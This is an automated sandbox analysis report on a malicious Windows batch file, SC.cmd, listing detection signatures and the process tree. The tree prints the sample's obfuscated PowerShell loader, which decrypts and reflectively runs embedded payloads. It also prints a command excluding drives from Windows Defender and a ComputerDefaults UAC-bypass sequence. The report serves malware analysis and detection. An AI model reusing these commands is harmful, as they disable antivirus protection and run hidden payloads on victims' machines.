Edit tour
Windows
Analysis Report
SC.cmd
Overview
General Information
| Sample name: | SC.cmd |
| Analysis ID: | 1524980 |
| MD5: | df146ae56b040ce90f1c879a8282a03e |
| SHA1: | 2e6024ad1883b72057dbaf5eaa2ea84656a443cf |
| SHA256: | 1e0819a321e43f692e6f2bb08c153ac62b2ae2cbbfb3a1ac7806d55ca3b54df9 |
| Tags: | azure-winsecure-comcmduser-smica83 |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: TrustedPath UAC Bypass Pattern
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious command line found
Suspicious powershell command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 3428 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\SC.cm d" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2720 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho cls;pow ershell -w hidden;fu nction dec rypt_funct ion($param _var){ $ae s_var=[Sys tem.Securi ty.Cryptog raphy.Aes] ::Create() ; $aes_var .Mode=[Sys tem.Securi ty.Cryptog raphy.Ciph erMode]::C BC; $aes_v ar.Padding =[System.S ecurity.Cr yptography .PaddingMo de]::PKCS7 ; $aes_var .Key=[Syst em.Convert ]::FromBas e64String( 't/6WxGFiW qzOYDiMeQW 3vewy5Lst4 QLmvh7FIz6 6oK8='); $ aes_var.IV =[System.C onvert]::F romBase64S tring('1xT nhp7Ji3XlX ldEQfx/mg= ='); $decr yptor_var= $aes_var.C reateDecry ptor(); $r eturn_var= $decryptor _var.Trans formFinalB lock($para m_var, 0, $param_var .Length); $decryptor _var.Dispo se(); $aes _var.Dispo se(); $ret urn_var;}f unction de compress_f unction($p aram_var){ IEX '$bNh Xj=New-Obj ect System .IO.M*em*o r*yS*tr*ea *m(,$param _var);'.Re place('*', ''); IEX '$FyATo=Ne w-Object S ystem.IO.* M*e*m*o*r* y*S*t*r*e* a*m*;'.Rep lace('*', ''); IEX ' $ElTgO=New -Object Sy stem.IO.C* om*pr*e*ss *io*n.*GZ* ip*St*re*a m*($bNhXj, [IO.C*om* pr*es*si*o n*.Co*mp*r e*ss*i*o*n *Mode]::D* e*c*omp*re *ss);'.Rep lace('*', ''); $ElTg O.CopyTo($ FyATo); $E lTgO.Dispo se(); $bNh Xj.Dispose (); $FyATo .Dispose() ; $FyATo.T oArray();} function e xecute_fun ction($par am_var,$pa ram2_var){ IEX '$dVs Pd=[System .R*e*fl*ec t*io*n.*As *se*mb*l*y *]::L*o*a* d*([byte[] ]$param_va r);'.Repla ce('*', '' ); IEX '$D UzhZ=$dVsP d.*E*n*t*r *y*P*o*i*n *t*;'.Repl ace('*', ' '); IEX '$ DUzhZ.*I*n *v*o*k*e*( $null, $pa ram2_var); '.Replace( '*', '');} $EYouL = ' C:\Users\u ser\Deskto p\SC.cmd'; $host.UI.R awUI.Windo wTitle = $ EYouL;$tjL TM=[System .IO.File]: :ReadAllTe xt($EYouL) .Split([En vironment] ::NewLine) ;foreach ( $xbxfP in $tjLTM) { if ($xbxfP .StartsWit h('DzoRhmG mBqXlnTxyA cGU')) { $ murOL=$xbx fP.Substri ng(20); br eak; }}$pa yloads_var =[string[] ]$murOL.Sp lit('\');$ payload1_v ar=decompr ess_functi on (decryp t_function ([Convert ]::FromBas e64String( $payloads_ var[0].Rep lace('#', '/').Repla ce('@', 'A '))));$pay load2_var= decompress _function (decrypt_f unction ([ Convert]:: FromBase64 String($pa yloads_var [1].Replac e('#', '/' ).Replace( '@', 'A')) ));$payloa d3_var=dec ompress_fu nction (de crypt_func tion ([Con vert]::Fro mBase64Str ing($paylo ads_var[2] .Replace(' #', '/').R eplace('@' , 'A')))); execute_fu nction $pa yload1_var $null;exe cute_funct ion $paylo ad2_var $n ull;execut e_function $payload3 _var (,[st ring[]] (' ')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
powershell.exe (PID: 5432 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6360 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" add-mppref erence -ex clusionpat h @('C:\', 'D:\') MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
WmiPrvSE.exe (PID: 2256 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - cmd.exe (PID: 1436 cmdline:
"C:\Window s\System32 \cmd.exe" /c "C:\Win dows \Syst em32\Compu terDefault s.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
ComputerDefaults.exe (PID: 824 cmdline: "C:\Window s \System3 2\Computer Defaults.e xe" MD5: D25A9E160E3B74EF2242023726F15416) - cmd.exe (PID: 1900 cmdline:
"C:\Window s\System32 \cmd.exe" /c rmdir " c:\Windows \"/s /q MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 6040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
svchost.exe (PID: 600 cmdline: C:\Windows \system32\ svchost.ex e -k Local Service -p -s BthAvc tpSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 2472 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||